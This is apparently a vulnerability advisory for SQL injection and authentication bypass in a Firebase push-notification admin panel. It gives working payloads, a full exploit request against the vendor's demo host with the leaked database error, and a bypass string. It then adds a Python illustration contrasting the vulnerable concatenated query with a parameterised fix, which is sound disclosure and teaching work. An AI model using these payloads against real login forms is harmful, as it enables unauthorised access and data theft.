# Exploit Title: Firebase Push Notification iOS / FCM + Advance Admin Panel 2.0 - 'username' SQL injection / Authentication bypass
# Date: 2018-07-08
# Exploit Author: L0RD
# Email: borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/firebase-push-notification-ios-fcm-advance-admin-panel/18600448?s_rank=19
# Version: 2.0
# Tested on: Win 10
=================================================
# POC :
1) SQL injection (error-based) :
# vulnerable parameter : username
# payload : 1') AND extractvalue(1,concat(0x3a,user(),0x3a))#
# Request :
==============
POST /advance_push/public/login HTTP/1.1
Host: www.icanstudioz.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
Connection: keep-alive
Upgrade-Insecure-Requests: 1
_token=ITG4QVFxob9066DAIbRm7pZ5UrFZAbN9eEQOyaVU&username=1') AND extractvalue(1,concat(0x3a,user(),0x3a))#&password=1
# Response :
===============
HTTP/1.1 500 Internal Server Error
Date: Fri, 06 Jul 2018 15:28:25 GMT
Server: Apache
Cache-Control: no-cache, private
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46984
Illuminate\Database\QueryException in /home/icanstud/public_html/advance_push/vendor/laravel/framework/src/Illuminate/Database/Connection.php line 651:
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':icanstud_icanstu@localhost:' (SQL: select * from admin where (username = '1') AND extractvalue(1,concat(0x3a,user(),0x3a))#' OR email = '1') AND extractvalue(1,concat(0x3a,user(),0x3a))#') and password = md5('1'))
=============================================
2) Authentication bypass :
# Query : select * from admin where (username = '' OR email = '') and password = md5('')
# Payload : x' OR 1=1)#
# Username : x' OR 1=1)#
# Password : anything
=============================================
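The following is an added illustration, not code from the advisory or from the vendor's product: it rebuilds the string-concatenated query visible in the 500 response, shows what remains of it once `#` comments out the tail, and puts the parameterised form beside it. The in-memory sqlite3 table, the admin row and its md5 password hash are constructed here as a stand-in for the application's MySQL `admin` table; md5 is kept only to mirror the page's schema.

```python
import hashlib
import sqlite3

# Vulnerable construction, reconstructed from the SQL echoed in the 500
# response above: the submitted username is spliced into both the username
# and the email comparison, so a quote in it rewrites the WHERE clause.
def build_vulnerable_query(username: str, password: str) -> str:
    return ("select * from admin where (username = '" + username
            + "' OR email = '" + username + "') and password = md5('"
            + password + "'))")

# What MySQL actually evaluates once '#' starts a comment. Deliberate
# simplification: a real tokenizer ignores '#' inside an unterminated string
# literal, but the payloads on this page close the quote first.
def effective_statement(sql: str) -> str:
    return sql.split("#", 1)[0].rstrip()

# Hardened form: the SQL text is fixed and the values travel as bound
# parameters, so the same payloads are compared as plain strings.
HARDENED_SQL = ("select * from admin where (username = ? or email = ?) "
                "and password = ?")

def make_admin_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the application's admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin (username text, email text, password text)")
    # md5 only mirrors the page's schema; real code should use bcrypt/argon2
    conn.execute("insert into admin values (?, ?, ?)",
                 ("admin", "admin@example.test",
                  hashlib.md5(b"correct-horse").hexdigest()))
    conn.commit()
    return conn

def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(HARDENED_SQL, (username, username, pw_hash)).fetchone()
    return row is not None

if __name__ == "__main__":
    bypass = "x' OR 1=1)#"
    # the password check is gone from the statement that reaches the engine
    print(effective_statement(build_vulnerable_query(bypass, "anything")))
    db = make_admin_db()
    print(login_hardened(db, bypass, "anything"))        # False
    print(login_hardened(db, "admin", "correct-horse"))  # True
```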